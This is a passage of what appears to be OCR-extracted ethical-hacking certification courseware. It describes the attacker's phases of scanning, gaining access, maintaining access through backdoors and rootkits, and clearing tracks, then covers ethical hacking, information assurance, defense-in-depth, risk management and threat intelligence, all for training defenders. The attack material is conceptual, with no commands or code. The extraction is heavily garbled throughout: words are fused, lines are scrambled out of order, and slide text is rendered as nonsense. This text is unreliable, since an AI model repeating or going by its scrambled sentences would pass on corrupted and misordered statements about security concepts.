logical extension of active reconnaissance,and in fact,s ome expertsdo not differentiate

scanningfrom active reconnaissance. Thereis a slight difference, however, i n that scanning
involvesmore in-depth probing on the part of the attacker.Oftenthe reconnaissance and
scanningphases overlap, and it is not always possible
to separate the two. An attackercan
gather criticalnetworkinformation suchas the mappingof systems, routers,andfirewallsby
Using
simple toolssuchas the standardWindows
toolssuchas Cheops to addadditional information utility
Traceroute.
to Traceroute’s
Alternatively,
results.
theycan use

Scanning can include the use of dialers, port scanners, network mappers,ping tools,
vulnerability scanners,or othertools.Attackersextract informationsuchas live machines, port,
portstatus,OSdetails, devicetype,andsystem uptimeto launchan attack.
Portscanners detectlistening portsto find informationaboutthe nature of services running on
the targetmachine. The primarydefense technique againstport scanners is shutting down
services
that are not required andimplementing
can still use toolsto determine the rulesimplemented
portfiltering.
appropriate
bythe portfiltering.
However,attackers

Themost commonly usedtools are vulnerabilityscanners,whichcan searchforthousands of

knownvulnerabilitieson a targetnetwork.Thisgives the attackera n advantage becausehe or
sheonlyhasto finda single professional
means of entry,whilethe systems hasto secure as
muchvulnerabilityas possible
byapplying
patches.Organizations
that use intrusion detection
still haveto remain vigilant
systems becauseattackers
c an andwill use evasion techniques
whereverpossible,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phase:Gaining
Hacking Access

Dhkote entcuscmeaet sams

irrtncetscomectedncmed BD

>= 9= —_
a trample ince cracking,
pasword utr
appliatio,or network
system, levels
hacking

eC SS
HackingPhase:Gaining
Access
Thisis the phase in whichrealhackingoccurs. Attackersuse vulnerabilitiesidentifiedduringthe
reconnaissance and scanningphases to gain access to the target
system and network.Gaining
access refersto the pointwherethe attackerobtainsaccess to the operating systemor to
applications on the computer or network.Theattackerc an gainaccess to the operating system,
application, or networklevel. Eventhough attackerscan cause plentyof damage without
gainingany access to the system, the impactof unauthorizedaccess is catastrophic. For
instance,externaldenial-of-serviceattackscan eitherexhaustresources or stopservices from
runningon the target system.Ending processescan stopa service, usinga logic bombor time
bomb, or even reconfigure andcrashthe system. Furthermore,attackerscan exhaustsystem
andnetworkresources byconsumingall outgoing communication links.
Attackersgainaccess to the targetsystem locally(offline),
over a LAN, or the Internet. Examples
Include password cracking, stack-basedbuffer overflows,denial-of-service, and session
hijacking. Using a technique calledspoofing to exploit the systembypretending to be a
legitimate user or different system, attackerscan senda data packet containing a bugto the
target systemi n order to exploit Packetflooding
a vulnerability. alsobreaksthe availability of
essentialservices. Smurfattacks attemptto cause userson a networkto floodeachotherwith
data,making i t appear as if everyone is attacking each other,and leaving the hacker
anonymous.
A hacker'schances of gainingaccessto a targetsystem depend on severalfactorssuchas the
architectureand configuration of the target
system, the skilllevelof the perpetrator, andthe
initial levelofaccessobtained.Oncean attacker gainsaccessto the targetsystem, theythentry
to escalateprivileges in order to take complete control.In the process,theyalsocompromise
the intermediate systems that are connectedto it.

08
Module 35
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 1
Phase:Maintaining
Hacking Access CEH
to the
access refers thephase
Maintaining
‘ofthe
system
w hen attackertries to retaintheir ownership

clive acess other

maypreventhesytemfrombeing
-Astacers
with
o wned
by
roots, o¢trojans
backdoors,
attackers thee
bysecuring

can data,
~astocers upload, or manipulate applications,
download, configueationso
and

use
the
attackers compromised to launch
system furtherattacks

Phase:Maintaining
Hacking Access
Maintaining
access refersto the phase
whenthe attackertries to retain hisor her ownership
of.
the system.Oncean attackergainsaccess to the targetsystemwith adminor root-level
(thus
privileges owningthe system), theycan use boththe systemandits resources at will. The
attacker a
can eitheruse the system
a low profile
damage.
as launchpad
andcontinue their exploitation.
For instance,
to scan andexploit othersystemsor to keep
Bothof theseactions can causea greatamount of,
the hackercould implement all network traffic,
a sniffer to capture
includingTelnetandFTP(filetransferprotocol) sessionswith other systems,andthen transmit
wherever
they
that data
Attackers
please.
who chooseto remain undetectedremove evidence of their entryandinstalla
backdooror a trojanto gain repeataccess. Theyc an alsoinstallrootkitsat the kernellevel to
gain full administrativeaccessto the targetcomputer. Rootkitsgain accessat the operating
system level,
whiletrojansgainaccessat the applicationlevel.Bothrootkitsandtrojansrequire
Usersto installthem locally.In Windowssystems, installthemselves
most trojans as a service
andrun as partof the localsystem with administrative
access.
Attackerscan upload, download, or manipulate data,applications, and configurationson the
ownedsystemand can also use trojansto transferusernames, passwords, and any other
informationstoredon the system. They can maintain controlover the systemfor a longtime by
closingup vulnerabilities
to prevent other hackersfromtaking controlof them,andsometimes,
rendersome degree
in the process, of protectionto the system fromother attacks.Attackers
Use the compromised system to launchfurtherattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phase:Clearing
Hacking Tracks
413
H
e e e
Clearing

by attacker’
intentions
tracks referstothe ‘he
continuing
include “Te
attacker overwrites the

to sytem
es carcedo ut 30 obtaining acess and
server, system, appitlon

and
stackerhie maliciousacts ‘he
vim remaining logs0 avoidsrpicion
‘anaticed uncaugh,

lead mig
evidence
and
deleting that
to thei prosecution

é ii
Phase:Clearing
Hacking Tracks
For obviousreasons, suchas avoiding legaltrouble and maintaining access, attackerswill
usually attempt to erase all evidence of theiractions.Clearing tracksrefersto the activities
carriedout byan attackerto hidemaliciousacts. Theattacker'sintentions includecontinuing
accessto thevictim’s system, remainingunnoticed and uncaught, anddeleting evidence that
might lead to their own prosecution.They use utilities such as PsTools
(https://docs.microsoft.com), Netcat,or trojans to erase their footprints fromthe system's log
files.Oncethe trojansare in place, the attackerhasmost likelygained total controlof the
system and can execute scripts i n the trojanor rootkit to replace thecriticalsystem andlogfiles
to hidetheir presence i n the system. Attackersalways cover theirtracksto hidetheir identity.
Othertechniques includesteganography and tunneling. Steganography is the processof hiding
data i n other data,for instance,i n imageand soundfiles.Tunneling takesadvantage of the
transmission protocol bycarryingone protocol over another.Attackerscan use even a small
amount of extra spacei n the data packet's TCPandIP headersto hideinformation.An attacker

against
other
or
as
a
can use the compromised
reaching anothersystem
into anotherattack’s
system to launchnew attacks
on the networkundetected.
reconnaissancephase. System
Thus,
systems
this phase
administrators
meansof
of the attackcan turn
can deploy host-based IDS
(intrusion detection systems) and antivirus softwarei n order to detect trojansand other
seemingly
compromised
files
techniques of and directories. An ethicalhackermust beaware the toolsand
that attackers deployso that they can advocate and implement
countermeasuresdetailed in subsequent modules.
the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
ModuleFlow CEH
©Brermen
sooner
©rcxing concent

InformationSecurity
awe and Standards

Ethical Hacking
Concepts
ethical
‘An
hacker to amalicious
hacker.
followsprocesses
maintain access to a computer
similar thoseof
systemare similarirrespective
Thesteps to gainand
of thehacker'sintentions.
an overview of ethicalhacking,
section provides
‘This whyethicalhacking
is necessary,the scope
andlimitationsofethicalhacking,andthe skillsof an ethicalhacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is Ethical Hacking?

(©
thicat
hacking involves
theuse of hacking
tools, tricks, andtechniques
to
identity
vulnerabilities

1@‘efocuses thetechiques
on simulating
vulnerabilities
used byattackers
ina system'ssecurity of
to veritythe existenceexploitable

|©eticalhackers
concerned
performsecuryassessmentsfran organization
authorities
withthepermission
of
Whatis Ethical Hacking?
Ethicalhacking of employing
is the practice computer and networkskillsi n order to assist
organizationsi n testingtheirnetworksecurity loopholes
forpossible andvulnerabilities.
White
Hats(also knownas security analysts
or ethicalhackers)are the individualsor expertswho
perform ethical hacking. Nowadays, most organizations (suchas private companies,
and government
Universities, organizations)
are hiring
WhiteHatsto assistthem in enhancing
their cybersecurity. Theyperform hacking
i n ethicalways, with the permission of the network
or systemowner and without the intention to cause harm. Ethicalhackersreportall
vulnerabilitiesto the system and network owner for remediation, thereby increasingthe
security of an organization's
informationsystem. Ethicalhacking involvesthe use of hacking
tools,tricks,andtechniques typically
usedbyan attackerto verify the existenceof exploitable
vulnerabilitiesi n system
security.
Today,
the term hacking
is closely
associatedwith illegal
and unethicalactivities. Thereis
continuingdebateas to whetherhacking can beethicalor not,giventhefactthat unauthorized
accessto anysystem is a crime. Considerthe following
definitions:
=
The noun “hacker―refersto a person who enjoys learning the detailsof computer
systems andstretching theircapabilites.
Theverb “tohack― describesthe rapiddevelopment of new programsor the reverse
engineering of existingsoftwareto make it better or more efficient i n new and
innovative ways.
Theterms “cracker― referto personswhoemploy
and“attacker― their hacking
skillsfor
offensivepurposes.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Theterm “ethical
hacker― professionals
refersto security who employ
their hacking
skillsfor defensivepurposes.
Most companies employ
IT professionals
to audit their systemsfor knownvulnerabilities.
Although this is a beneficialpractice,crackersare usually
more interestedi n usingnewer,
lesser-known and so these by-the-numbers
vulnerabilities, system auditsdo not suffice.A
companyneedssomeone
andexploits,
and recognize
ethicalhacker.
who can think like a cracker,

potential
vulnerabilities
where
others
cannot.of
keep
up with the newest vulnerabilities
Thisis the role the

Ethicalhackersusually
employ the same toolsand techniques
as hackers,
with the important
exceptionthat theydo not damage They
the system. evaluatesystemsecurity, update
the
administratorsregarding any discoveredvulnerabilities,
and recommendprocedures for
patching
those
Theimportant
vulnerabilities.
distinctionbetween ethicalhackersandcrackers is consent.Crackers
attemptto
gain unauthorizedaccess to systems, while ethicalhackersare always completelyopen and
aboutwhatthey
transparent a re doing
andhowthey are doing hacking
it. Ethical is, therefore,

always
legal.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WhyEthical Hacking
is Necessary

‘To
beat a hacker,youneedto think like one!
Ethical
hackingis necessaryast allows
forcounterattacks malicious
against hackers
through the
anticipating
methods used
to thesystem
breakinto

Reasonswhyorganizations
recruit ethical hackers

information
stems
.

fons ‘void breaches

secunty

potenti a s securityrisk
customer fear
Tehelp date

Tosraive
and strenathen
a

oreanations acuity

WhyEthical Hacking
is Necessary
(Cont'd)
Thiel HackersTryo
AnswertheFollowing
Quertions

© whet can an
with
intruderdo that information? Access
(Gaining andMaintaining
Access
phases)

©ering
tac
Does anyoneat theage
pases)
oraizaton note theintrude ater " or
successes?
(Reconsistance and

@ % oftheinformation
scomponents adequately
system protected, andpatched?
updated,

@ How mcr ine, or, andmoney

aerequedto aban adequate
protection?

@ 1 1%ormain scrty meses in ith gl andins

complance sands

WhyEthical Hackingis Necessary

As technology
is growingat a fasterpace,so is the growth
i n the risksassociated
with it. To
beata hacker,
Ethical hacking is necessary
to
itis necessarythink likeone!
a s it allowsto counter attacks from malicious hackersby
methodsusedbythem to break into a system.
anticipating Ethicalhackinghelpsto predict
various possible
vulnerabilitieswell i n advanceand rectify
them without incurringany kindof

ical andCountermensores
Mackin ©by E-Comel
Copyright
outsideattack.As hackinginvolvescreative thinking,
vulnerability
testing,and security
audits
alone cannot ensure that the network is secure. To achievesecurity, organizationsmust
implement a “defense-in-depth―
strategy bypenetratingtheir networks
to estimate andexpose
vulnerabilities.
Reasonswhy recruitethicalhackers
organizations
=
Topreventhackersfromgainingaccessto the organization'sinformation
systems
=

=
Touncover
vulnerabilities
Toanalyze
explorerisk
andstrengthen
and
i n systems

an organization’s
their potential
securityposture,
asa

including
policies,
infrastructure,
network protection andend-userpractices
=
Toprovideadequate preventive breaches
measuresin orderto avoidsecurity
=
Tohelp safeguard
the customer data
=
Toenhancesecurity
awareness at all levelsi n a business

ethicalhacker'sevaluationof a client'sinformationsystemsecurityseeksto
‘An

basic
questions: answer three

attacker
1. Whatcan an seeon
checksbysystem
Normalsecurity
the targetsystem?
administrators
will often overlookvulnerabilities.The
hasto thinkaboutwhatan attackermight
ethicalhacker see during
the reconnaissance
and
.
scanning
Whatcan
phases
an
of an attack
intruderdowith that information?
The ethicalhackermust discern the intent and purposebehindattacksto determine
appropriatecountermeasures. Duringthe gaining-access phases
and maintaining-access
of an attack,the ethicalhacker
needsto be one stepaheadof the hackeri n order to
provide
adequate
protection.
attemptsbeing
Are the attackers’ noticedon the targetsystems?
Sometimesattackerswill tryto breacha systemfor days,
weeks,
or even months.Other
times
they
take thewill
gainbut
will
waitdoing
access
potential
time to assess the
before
use of exposed
theethicalhacker
reconnaissanceandcoveringtracksphases,
anything Instead,
damaging, they
information. Duringthe
shouldnotice andstopthe
will
attack
After carryingout attacks,hackersmay cleartheir tracksbymodifying logfiles and creating
backdoors, or bydeploying trojans.Ethicalhackersmust investigate whethersuchactivities
havebeenrecordedandwhat preventive measures havebeentaken.Thisnot only provides
themwith an assessmentof the attacker'sproficiency but also givesthem insight into the
existingsecuritymeasures of the systembeing evaluated.Theentire processof ethicalhacking
andsubsequent patching ofdiscoveredvulnerabilitiesdependson questionssuchas:
‘=
tryingto protect?
Whatis the organization
whomor whatare theytryingto protectit?
‘Against
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Areall thecomponents
of the information adequately
system protected,
updated,
and
patched?
andmoneyis the clientwilling
How muchtime,effort, to invest to gainadequate
protection?
Do theinformationsecurity measures comply with industry
andlegal standards?
Sometimes, i n orderto save on
or further
discovery,
resources prevent
to end the evaluationafter the first vulnerability is found; therefore,
the client might
it is important
ethicalhackerandthe clientwork out a suitableframeworkfor investigation
decide
that the
beforehand.The
clientmust be convinced of the importance of thesesecurityexercises through concise
descriptions
and must
of what is happening what is at stake.Theethicalhacker
to conveyto theclientthat it is never possible
alwaysbe improved.
to guard systems completely,
alsoremember
butthat theycan

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and Limitationsof Ethical Hacking
Scope
Scope Limitations

of
ie
(©Ethical

counter
acting acrucial
assessment,auditing,
component
rau, and
|@ Uniesthe businesses already
knowwhatthey
fr andwhytheyae hiringan
are looking

(©eure sksad highight

to identity remedial

Vulnerabilties
‘A
hacker
can
only eta
tobetterunderstand
helpthe organisation
ts ecurty system:isp

FE}
andLimitations of Ethical Hacking
Scope
Cat
Securityexpertsbroadly categorize
computer crimes into two categories: crimes facilitatedbya
computer andthosein whichthecomputer is the target.
Ethicalhacking is 2 structured and organized securityassessment, usually as part of a
penetration test or security audit,and is a crucialcomponent of risk assessment, auditing,
counter fraud, andinformation systems security bestpractices. It is usedto identify risksand
highlight remedial actions. It is also used to reduce Information and Communications
Technology (ICT)costsbyresolving vulnerabilities.
Ethicalhackersdeterminethe scopeof the security assessmentaccording to the client's
securityconcerns. Manyethicalhackers are members of a “Tiger
Team.― A tigerteam works
together to perform a full-scale
test coveringall aspects of the network,as well as physical and
system
intrusion
ethicalhackershouldknowthe penalties
‘An of unauthorizedhackinginto a system.No ethical
hacking activities associated with a network-penetrationtest or securityaudit shouldbegin
before receivinga signed legal documentgiving the ethicalhackerexpress permission to
perform the hacking activities fromthe targetorganization.
Ethicalhackersmust be judicious
with their hacking
skillsandrecognize
the consequences
of misusing
thoseskills.
Theethicalhacker andmoralobligations.
must follow certain rulesto fulfill theirethical They
must
*
following:
do the
Gain authorizationfrom the client and have a signed contract giving the tester
to perform
permission the test.
Maintain confidentiality when performing the test and follow a Nondisclosure
(NDA)
‘Agreement with the clientfor the confidentialinformationdisclosedduring the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 test. The information
gathered mightcontain sensitive information,
and the ethical
hackermust not discloseany informationaboutthe test or the confidentialcompany
a
datato third party.
Performthe test up to but not beyondthe agreed-upon limits.For example,ethical
hackersshouldperform DoSattacksonly
if theyhavepreviously agreeduponthiswith
the client, Lossof revenue, goodwill,and worse consequences could befall an
organizationwhoseservers or applications
are unavailable
to customers because of the
testing.
Thefollowing stepsprovide a frameworkfor performing audit of an organization,
a security
whic!
+h will help that the test is organized,
in ensuring efficient,
andethical:
Talkto theclientanddiscuss
the needs
to beaddressed thetesting
during
Prepare
an
andsignNDAdocuments
Organizeethical hacking
with cient
the
team andprepare the schedule
for testing

the
test
Conduct
Analyze
the results
ofthetesting
and preparea report

Presentto
thereportfindingsthe client
Howfever,thereare limitationstoo. Unlessthe businesses
andwhy
first knowwhattheyare looking for
theyare hiring an outsidevendorto hacktheir systems i n the first place,
chances
a re
therewould not be muchto gain fromexperience.An ethicalhacker, thus,can onlyhelpthe
nization to better understandits securitysystem.
orgar It is up to the organization to place
the
rightsafeguards on the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Skills of an EthicalHacker

‘Technical
Skills Non-TechnicalSkills

Skills of an EthicalHacker
It essentialfor an ethicalhackerto acquire the knowledge
is and skillsto becomean expert
hacker
andto
be a good
use thisknowledgei n a lawfulm anner. Thetechnical
ethicalhackera re discussed below:
andnon-technicalskills
to
Technical Skills
©
Linux,
knowledge
In-depth of major
andMacintosh operating suchas Windows,
environments, Unix,

In-depth
knowledge
of networking technologies,
concepts, andrelatedhardware
andsoftware
© Acomputerexpertadept
at technicaldomains
© Theknowledge

© High
of
securityareasandrelatedissues
technicalknowledge
of howto launchsophisticated
attacks
Non-Technical
Skills
© Theability
to quickly new technologies
learnandadapt

©
[Astrong
ethic
to
a n solving
work

security
policies
andgood
Commitment organization's
problem and communicationskis

‘An
local
awareness of standards
andlaws

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ Wermaonscenty
Gyber
at Chain
© wrcring
concepts
EthicalHacking
@ ermationsocuty

Information Controls
Security
Information controlspreventthe occurrence of unwanted
security events andreducerisk to
the organization's
informationassets.Thebasicsecurityconceptscriticalto informationon the
Internet are confidentiality,
integrity,andavailability;
the concepts relatedto the persons
accessingthe informationare authentication,
authorization,
and non-repudiation,
Information
is the greatest It must be securedusingvarious policies,
asset of an organization. creating
awareness,employing securitymechanisms,or byother means.
Thissection dealswith InformationAssurance(IA),defense-in-depth, cyber
risk management,
threat modeling,
threat intelligence, incidentmanagement,
andAl andML concepts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
InformationAssurance(IA) CEH
|G ihrfersto theassurance thatthe integrity confdeniity,
availabilty, and authenticof infrmation
and information
‘vitae protected duringtheuse, potesing, store, andansmsion a nfrmation
{0 Someothe proces tht eip i n sci ifrmton sree nce

©rw ctvoy ocean eine © crs aerated

ore reueaens

)
© veutngrewound
treats
@ retin cri nd nerstaon

©nein an nd resem
e gna
sien
ng
InformationAssurance(IA)
lA refersto the availability,
assurance of the integrity, confidentiality,
and authenticity
of
information
andinformationsystems duringthe usage,processing,
storage,andtransmissionof.
information.Security
expertsaccomplish informationassurance with the helpof physical,
technical,and administrative controls.InformationAssuranceand Information Risk
Management (IRM)ensure that onlyauthorizedpersonnel
access and use information.This
helps
i n achieving
informationsecurity
andbusinesscontinuity.
‘Some that help
ofthe processes in achieving
information
a ssuranceinclude:

Developinglocalpolicy, andguidance
process, i n sucha way to maintain theinformation
systemsat an optimum securitylevel
Designing networkand user authentication strategy—Designinga secure network
ensures the privacy of user recordsand other information on the network.
Implementing an effective user authenticationstrategysecures the information
system'sdata
Identifying
networkvulnerabilitiesand threats—Vulnerability
assessmentsoutline the
securitypostureof the network.Performing
vulnerability
assessmentsi n search
of
networkvulnerabilitiesandthreatshelpto takethe proper measures to overcome them,
Identifying
problems andresource requirements
Creating
a planfor identifiedresource requirements
Applying information
appropriate assurancecontrols

Performing the Certification

and Accreditation(C&A) processof informationsystems
helps andimplement
to trace vulnerabilities, safetymeasures to

ical
them
nullify
andCountermensores ©
Mackin by E-Comel
Copyright
Providing informationassurance trainingto all personnel in federaland private
brings
organizations amongtheman awareness of informationtechnology

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Defense-in-Depth

©.
Defense.n-depth
is security strategy

In
which
placed
Layers
several layers
protection
throughout
an information
are

to direct
atacks
Defens
“©:
khelps prevent against
hesystem a ndits databecause

none
only
break layer leadsthe
attackerto the nent layer

Defense-in-Depth
Defense-in-depth strategyi n whichsecurity
is a security professionalsuse severalprotection
layers throughout an informationsystem. Thisstrategyusesthe military thatits more
principle
difficultfor an enemyto defeata complex andmulti-layered defensesystem than to penetrate
a single barrier. helps
Defense-in-depth to prevent directattacksagainstan informationsystem
and its databecausea breakin one layer onlyleadsthe attackerto the next layer.If a hacker
gains access to a system,defense-in-depth minimizes any adverse impactand gives
administrators and engineerstime to deploy
new or updatedcountermeasuresto prevent
recurrence of the intrusion,

Layers
Defense Figure
in
13:DefenseDepth

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is Risk?

(©
are
categorie
ks
levels
to event
(@fk refers tothedegree

estimated
onthe
of uncertainty
intdiferent according
tat an adverse
or expectation

ther
may
case

impact system
tothe ter
damage

(©used
osale the Risk
Ariseatrx
or
impact
ofthe
rik
Matrix
Risk Levels
ky considering probablykehood,andconsequence

Whatis Risk?
Riskrefersto the degree
of uncertainty or expectationof potential
damagethat an adverse
eventmaycause to the system specified
or its resources, under Alternatively,
conditions. risk
can alsobe:
‘=
Theprobability
of the occurrence
or have othernegative
liabilities.
of
athreator a n event that will damage,
impactso n the organization,
cause lossto,
either frominternalor external

Thepossibility uponan internalor externalvulnerability

of a threat acting andcausing
harmto a resource,
The product
of the likelihoodthat an event will occur and the impactthat the event
mighthaveon an informationtechnology asset.
relationbetweenRisk,
‘The Threats, andImpact
Vulnerabilities, is as follows:
RISK= Threatsx Vulnerabilitiesx Impact
Theimpactof an event on an informationassetis the product
of vulnerability
i n the assetand

value
to =Threat
theasset’s its stakeholders.
to,
IT riskcan beexpanded

xAsset
Vulnerability
RISK
Value x

In fact,the riskis thecombinationof the following

two factors:
The
The
of
probability
of
the occurrence

consequencethe adverseevent
of an adverseevent

ical andCountermensores
Mackin ©by E-Comel
Copyright
RiskLevel
Risklevel is an assessmentof the resultedimpacto n the network.Variousmethodsexist to
differentiatethe risklevelsdepending
methodsusedto classify
on the riskfrequency
risksis to develop
and severity.
a two-dimensional
matrix.
One the common
of
Working
out the frequency
or probability
of an incidenthappening
(likelihood)
and its possible
consequences to analyze
is necessary risks.Thisis referred
to as thelevelof risk.Riskcan be
and theConsequence
representedcalculatedusing followingformula:
Levelof Risk= x Likelihood
categorized
Risksare into different
levelsaccordingto their estimated impacton the system
there are four risk levels,whichinclude extreme,high,medium,and low levels.
Primarily,
Rememberthat controlmeasures maydecrease the levelof a risk,but do not alwaysentirely
eliminate
the
risk.
|
RiskLevel Consequence Action

| Immediatemeasures requiredto combatthe risk

are
Extremeor
High
Seriousor
Imminentdanger Identify
andimposecontrolsto reducethe riskto
reasonably
low level
Immediateaction is not required,but action shouldbe
a
Moderatedanger
implementquickly
Implementcontrols to reducetheriskto
as soon as possible
a reasonably
low level

lowNegligible
|> steps of
riskdanger Takepreventive
Table
1 .1: RskLevels
to mitigatetheeffects

RiskMatrix
Theriskmatrix scales the riskoccurrence or likelihoodprobability,
along with its consequences
cr impact. Itis the graphicalrepresentation of riskseverity
andthe extent to whichthe controls
can or will mitigateit. TheRiskmatrix is one of the simplest processesto use for increased
visibility
of risk;i t contributesto the management's decision-making
capability. Theriskmatrix
definesvarious levelsof riskand categorizes them as the product
of negative probability
and
negativeseverity. Although there are manystandardrisk matrices, individual organizations
must create their
own,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Major Severe
veryHigh Extreme Extreme
Probability
High Wigh Extreme
Probability
Equal
Probability
low
Medium High High

Probability igh
veryLow
Probability towlow High

Theabovetableis thegraphical representation of a riskmatrix,whichis usedto visualizeand

compare risks.It differentiatesthe two levelsof riskandis a simple
of them.
way analyzing
‘©

=
Consequence:
chance
Likelihood:The
of
the
riskoccurring
ofa riskevent that occurs
Theseverity
Note: Thisis an example of a risk matrix. Organizations
must create individualrisk matrices
basedo n their business
needs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Risk Management
{@ Risk management
isthe process of reducing
nd maintaining
risk tan acceptable
levelby means ofawell-defined
andaivelyemployedsecunty program
Management Phases
Risk

isk Tdeuitcaon
©
Senter cman andtr eat

ane
eta
[Risk
Assessment Aesesssu

Risk
Treatment
implements
appropriate
forthe©Seles and control deniedrisks

Risk
Teacking
{espera
containers© harrow i ances

Risk
Reviow
the
performance
sk “6
vatates fhe enlementedmanagement
states

Risk Management
Riskmanagement is the processof identifying,
assessing,respondingto, andimplementing the
activities that controlhowthe organization managesthe potential effectsof risk.It has a
prominentplacethroughout life cycle
the security and is a continuous and ever-increasing
complex process.Thetypesof risksvary from organization but the act of
to organization,

a
RiskManagement Objectives
plan all
preparing riskmanagementis common to organizations.

=
potential
Identify is the main objective
risks—this of riskmanagement
Identify
‘=
the impactof risksandhelp the organizationdevelop betterrisk management
strategies andplans
Prioritize the risks, depending on the impact or severityof the risk, anduse established
riskmanagement methods, tools,andtechniques to assisti n thistask
Understand and
analyze
the identified
risk
events.
risksandreport
Controlthe riskandmitigateits effect.
Create awareness amongthe security staffanddevelop strategies and plansfor lasting
riskmanagement strategies.
Riskmanagement is a continuous process performed byachieving goals at everyphase. It helps
reduce and maintain riskat an acceptable
level utilizing
a well-definedand actively
employed
securityprogram.This processis appliedi n all stages for example,
of the organization, to
specific andoperational
networklocationsi n bothstrategic contexts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 fourkeystepscommonly
‘The termedas riskmanagement
phases
are:
=

Risk
Risk Identification
Assessment
Risk
Treatment
‘=
RiskTracking
andReview
Every
organization whileperforming
shouldfollowtheabovesteps theriskmanagement
process
=

Risk
Identification
plan.Its main aim is to identify
Theinitialstepof the riskmanagement the risks—
including
the sources, causes, and consequencesof the internal and externalrisks
affecting
thesecurity
oftheorganization
beforetheycause harm.Theriskidentification
processdepends on the skill set of the people,and it differsfrom one organization to
another.
RiskAssessment
Thisphase assessesthe organization's risksand estimatesthelikelihood and impactof
thoserisks.Riskassessmentis an ongoingiterative processthat assigns for risk
priorities
and implementation
mitigation plans, whichin turn helpto determine the quantitative
andqualitativevalueof risk.Every organizationshouldadopt a riskevaluationprocessi n

to
order detect,prioritize, andremove risks.
Theriskassessmentdeterminesthe kindof riskspresent, their likelihood andseverity,
and plans
and the priorities for riskcontrol.Organizations perform a risk assessment
whentheyidentify a hazardbut are not ableto controli t immediately. A riskassessment
is followedbya regular
RiskTreatment
of
updateall informationfacilities.

Risktreatment is the process of selecting

andimplementing appropriate controlson the
identifiedrisksin order to modify them.The risk treatment methodaddresses and
treats the risksaccording level.Decisionsmadei n this phase
to their severity are based
on the resultsof a riskassessment.Thepurposeofthis stepis to identify treatments for
the risksthat fall outsidethe department's risktoleranceandprovide an understanding
ofthelevelofriskwithcontrolsandtreatments, It identifies the priorityorderi n which
individualrisksshouldbe treated,monitored, andreviewed.Thefollowing information
is neededbefore treatingtherisk

method
oftreatment
Theappropriate
Thepeople
responsible
for the treatment

costs
The involved
Thebenefitsof treatment
Thelikelihoodof success

Waysandthe
to measure assess treatment
ical andCountermensores
Mackin ©by E-Comel
Copyright
RiskTracking andReview
‘An planrequiresa tracking
effectiverisk management and review structure to ensure
effectiveidentificationand assessmentof the risksas well as the use of appropriate
controlsand responses.The tracking and review processshould determinethe
measures and procedures adopted and ensure that the informationgathered to
perform the assessmentw as appropriate. Thereview phase evaluatesthe performance
of the implemented risk management strategies.Performing regular inspectionsof
policies and standards, as well as regularlyreviewingthem,helpsto identify the
opportunities for improvement. Further,the monitoring process ensures that there are
appropriate controlsi n placefortheorganization's activities andthat all proceduresare
understoodandfollowed,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CyberThreatIntelligence
‘Typer
ofThreatintelligence

Test(Cis
the
(©cyber

of asintligence
eallection
andanaly
defined
information strategic Tactical

‘Operational

cyber
mitigate
thet intligence
1 0tdentyand
els the orpnization
valourbtiner ike
rome ak Nero ne

dvocedandproete defence
sateles

Threat Intelligence
Cyber
According to theOxforddictionary, possibility
a threat is definedas “the of a maliciousattempt
to damage or disrupta computernetworkor system.― A threatis a potentialoccurrence of an
undesiredevent that can eventually damage and interruptthe operational and functional
activities of an organization.A threat can affectthe integrity andavailabilityfactorsof an
organization. The impactof threatsis very greatand mayaffectthe state of the physical IT
Theexistenceof threatsmay be accidental,
assetsi n a n organization. intentional,
or dueto the

Cyber
of
impact some action.
threat intelligence,
usuallyknownas CTI, is the collectionand analysis of information
about threatsandadversaries and the drawing up of patterns that provide an ability
to make
knowledgeable decisionsfor preparedness, prevention, and response actions against various
cyberattacks. or discovering
It is the process of recognizing threats―
any “unknown that an
may faceso that necessary
organization can be applied
defensemechanisms to avoidsuch
occurrences. It involves collecting,
researching,
and analyzing
trends and technical
developments in the field of cyberthreats(including cybercrime, hacktivism,and espionage).
knowledge
‘Any aboutthreatsthat resultsi n an organization's planning and decision-making to
handleitis a pieceofthreat Intelligence. Themain aim ofCTIis to makethe organization aware
of existing
or emerging threatsand prepare themto develop a proactivecybersecurityposture
in advanceof exploitation. Thisprocess,whereunknownthreatsare converted into possibly
knownones, helps to anticipatethe attackbefore it can happen, and ultimately resultsi n a
betterand more secure system. Thus, threatIntelligence is usefuli n achievingsecure data
sharingandglobal transactionsamong organizations.
Threatintelligence processes can be usedto identify the risk factorsthat are responsible for
malwareattacks, SQLinjections, web applicationattacks, dataleaks,phishing, denial-of-service

ical andCountermensores
Mackin ©by E-Comel
Copyright
 andotherattacks.Suchrisks,afterbeing
attack, filteredout, can be put on a checklist
and
handledappropriately.
Threatintelligence to handle cyber
is beneficialfor a n organization

threats
alsostrengthens
responding
andaidsin
planning
witheffective andexecution. Along
the organization's
suchrisks
against
defensesystem,
witha thorough analysis
of
the threat,
creates awareness about impending
CTI
risks,

‘Types Intelligence
ofThreat
Threatintelligence is contextualinformationthat describes threatsandguides organizations in
making various business decisions.It is extractedfrom a huge collectionof sources and
information.It provides operational insightbylooking outsidethe organization and issuing
threats
alertson evolving to the organization.
collectedfromdifferent sources,it is important
types.Thissubdivisionis performed
For the better management

basedon the consumers andgoals

of informationthat is
to subdividethreat intelligence into different
of the intelligence. From
the perspective of consumption, threat intelligenceis divided into four different types. They
are, namely, strategic,tactical,
operational, andtechnicalthreat intelligence. Thesefour types
differi n terms ofdatacollection, dataanalysis,andintelligence consumption.
=

Threat
Strategic
threat
Intelligence
Strategic intelligence provides information regarding
high-level cybersecurity
